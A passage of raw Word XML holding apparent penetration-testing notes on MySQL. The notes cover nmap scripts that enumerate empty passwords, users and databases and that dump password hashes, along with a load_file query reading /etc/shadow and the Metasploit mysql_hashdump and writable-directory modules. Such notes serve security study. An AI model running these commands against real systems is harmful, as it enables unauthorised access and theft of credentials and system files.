          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Port 3306/tcp – MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C2EC04B" w14:textId="77777777" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0FA9084A" w14:textId="6BFBECBD" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script=mysql-empty-password” – Enumerate users with empty passwords.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117B47B" w14:textId="77777777" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74537200" w14:textId="044C685A" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script=mysql-info” – Enumerate basic info about SQL database (service info, versions, etc.)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C93DC4" w14:textId="472FD58A" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>InteractiveClient will let you have access to the system through MySQL (VULNERABILITY)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52CAFA30" w14:textId="77777777" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27C40411" w14:textId="1CC4DEE3" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script=mysql-databases –script-args=”mysqluser=’(USER)’,mysqlpass=’(PASS)’” – Enumerate SQL databases</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BAECE01" w14:textId="77777777" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="108146E6" w14:textId="08BE25B9" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script=mysql-users –script-args=”mysqluser=’(USER)’,mysqlpass=’(PASS)’” – Enumerate users through SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16130D3F" w14:textId="77777777" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="00FE48F6" w14:textId="6EB7FF4D" w:rsidR="003664A9" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="003664A9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script=mysql-variables –script-args=”mysqluser=’(USER)’,mysqlpass=’(PASS)’” – Enumerate a LOT of DB information</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CB38087" w14:textId="57C66D82" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="003664A9" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Datadir = where everything is being stored</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41713C2F" w14:textId="77777777" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="31C95622" w14:textId="7693702A" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script-mysql-audit –script-args=”mysqlaudit.username=’(USER)’,mysql-audit.password=’(PASS)’,mysql-audit.filename=’/usr/share/nmap/nselib/data/mysql-cis.audit’”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E5196AB" w14:textId="4BB9E91F" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This command will display the MySQL benchmarks to display what configurations are in place for the MySQL server.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588D5AD8" w14:textId="77777777" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6A56CEB5" w14:textId="63EBDF47" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“nmap (HOST) -sV -p 3306 –script-mysql-query –script-args=”query=’select count(*) from (DATABASE, TABLES)</w:t>
      </w:r>
      <w:r w:rsidR="00496C04" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>;’,username=’(USER)’,password=’(PASS)’”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14967E64" w14:textId="77777777" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05018046" w14:textId="55E20823" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>“nmap (HOST) -sV -p 3306 –script=mysql-dump-hashes –script-args=”username=’(USER)’,password=’(PASS)’ ”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1118FDE0" w14:textId="65C8F050" w:rsidR="00CD5DC5" w:rsidRPr="002A77BD" w:rsidRDefault="00CD5DC5" w:rsidP="00CD5DC5">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Dump user hashes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68445632" w14:textId="77777777" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7A8BD2DE" w14:textId="303A62D2" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Note that for a lot of these, the USER and PASS need to be enumerated in order to run a lot of these scripts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="225AD8C0" w14:textId="4B35C721" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Enumerating the system with the mysql-empty-password script is very helpful.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59A545D4" w14:textId="77777777" w:rsidR="00496C04" w:rsidRPr="002A77BD" w:rsidRDefault="00496C04" w:rsidP="00496C04">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0685FFAA" w14:textId="77777777" w:rsidR="005A3DB9" w:rsidRPr="002A77BD" w:rsidRDefault="005A3DB9" w:rsidP="005A3DB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051376EB" w14:textId="21E28A66" w:rsidR="005A3DB9" w:rsidRPr="002A77BD" w:rsidRDefault="005A3DB9" w:rsidP="005A3DB9">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>MySQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70792AC7" w14:textId="7EC2723D" w:rsidR="005A3DB9" w:rsidRPr="002A77BD" w:rsidRDefault="005A3DB9" w:rsidP="005A3DB9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“mysql -h (HOST) -u</w:t>
      </w:r>
      <w:r w:rsidR="00D41249" w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> (USER)” (Root tends to be the default admin)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DBAFE76" w14:textId="25E59809" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“show databases;” – Displays all tables in the database.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4AC17B48" w14:textId="6030ECA0" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“use (TABLE)” – Select a particular table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B721B66" w14:textId="2890FFE1" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“select * from (TABLE);” – Select all rows (and all contents) from a table.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67788282" w14:textId="077D7C16" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“select * load_file(“/etc/shadow”);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C3950FA" w14:textId="534CDF01" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>If the used SQL user has the correct permissions, we could potentially load files straight from the machine the server is hosted on. (ENUMERATE THIS FIRST)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4141E7DF" w14:textId="5E460DA7" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>This command specifically is looking at the contents of /etc/shadow. I call this the gold mine of penetration testing.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B7DA13" w14:textId="773F94AC" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4186D029" w14:textId="173F45A3" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Metasploit – SQL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D5B6032" w14:textId="3C591064" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/mysql/mysql_writable_dirs” – Enumerates writable directories.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2658CC53" w14:textId="6E791FC1" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key tip: “setg RHOSTS” allows you to set a global variable in MSFConsole.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B49EB41" w14:textId="2E4B6319" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key tip 2: Set verbose to false, this module will display a lot of info.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="412C8F27" w14:textId="59887F5C" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="2"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Verbose option is in the “advanced” options.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DE4477B" w14:textId="5CACD06C" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Key tip 3: set password “”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DEC172B" w14:textId="2F7B4482" w:rsidR="00D41249" w:rsidRPr="002A77BD" w:rsidRDefault="00D41249" w:rsidP="00D41249">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will check for writable directories and output those that are not writable that are ON the system running SQL.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="380375E0" w14:textId="5861C062" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“auxiliary/scanner/mysql/mysql_hashdump”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D4CDF2F" w14:textId="16647123" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“set USERNAME (user)”</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2686C433" w14:textId="74872F68" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="007D1A77">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“set PASSWORD “” ” – Even though its already blank, still need to specify empty pass.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BDAC7B7" w14:textId="75DDC7A2" w:rsidR="007D1A77" w:rsidRPr="002A77BD" w:rsidRDefault="007D1A77" w:rsidP="00496C04">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="6"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002A77BD">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Will dump hashes of different users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06F32C6D" w14:textId="63530FB6" w:rsidR="007625EF" w:rsidRPr="002A77BD" w:rsidRDefault="007625EF" w:rsidP="007625EF">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="6"/>
